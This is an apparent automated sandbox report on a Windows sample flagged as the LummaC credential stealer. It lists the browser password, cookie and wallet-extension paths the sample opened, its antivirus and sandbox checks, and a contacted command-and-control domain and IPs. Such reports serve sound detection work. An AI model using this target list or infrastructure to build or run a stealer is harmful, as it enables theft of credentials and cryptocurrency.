Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: file.exe, 00000000.00000002.2513695692.0000000005D4D000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: (Program Manager
Source: file.exe, file.exe, 00000000.00000002.2507713715.0000000000E92000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: -1cProgram Manager
Source: file.exe Binary or memory string: tA(Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.2262556992.000000000084F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2262556992.0000000000843000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4344, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000003.2406591224.0000000000850000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ctronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/G
Source: file.exe, 00000000.00000003.2241242075.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe, 00000000.00000003.2241242075.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2241242075.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2241242075.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4344, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4344, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565521 Sample: file.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 28 atten-supporse.biz 2->28 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 5 other signatures 2->44 8 file.exe 12 2->8         started        signatures3 process4 dnsIp5 30 185.215.113.16, 49745, 80 WHOLESALECONNECTIONSNL Portugal 8->30 32 atten-supporse.biz 104.21.16.9, 443, 49707, 49709 CLOUDFLARENETUS United States 8->32 46 Detected unpacking (changes PE section rights) 8->46 48 Query firmware table information (likely to detect VMs) 8->48 50 Tries to detect sandboxes and other dynamic analysis tools (window names) 8->50 52 8 other signatures 8->52 12 chrome.exe 1 8->12         started        15 chrome.exe 8->15         started        signatures6 process7 dnsIp8 34 192.168.2.6, 443, 49701, 49702 unknown unknown 12->34 36 239.255.255.250 unknown Reserved 12->36 17 chrome.exe 12->17         started        20 chrome.exe 15->20         started        process9 dnsIp10 22 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49714, 49716 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->22 24 www.google.com 142.250.181.100, 443, 49793, 49981 GOOGLEUS United States 17->24 26 5 other IPs or domains 17->26
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.107.246.63
 s-part-0035.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
104.21.16.9
 atten-supporse.biz United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.6

Contacted Domains

Name IP Active
atten-supporse.biz 104.21.16.9 true
www.google.com 142.250.181.100 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
js.monitor.azure.com unknown unknown
mdec.nelreports.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://atten-supporse.biz/api false
    		high
    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js false
      		high